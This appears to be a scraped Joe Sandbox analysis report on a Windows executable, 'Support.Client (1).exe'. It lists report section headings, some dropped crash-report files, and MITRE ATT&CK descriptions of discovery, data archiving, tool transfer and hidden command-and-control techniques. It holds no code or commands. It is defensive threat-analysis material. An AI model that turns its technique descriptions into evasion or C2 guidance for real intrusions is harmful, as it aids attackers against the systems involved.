Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Privilege Escalation

Compliance

Spreading

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Support.Client (_5a63c4432494455eb3628cc1cc7766c341e5_7de988b1_f7842060-755f-4376-8235-8587ed83ab01\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3609.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER36D5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3724.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3741.tmp.csv

Windows Analysis Report
Support.Client (1).exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre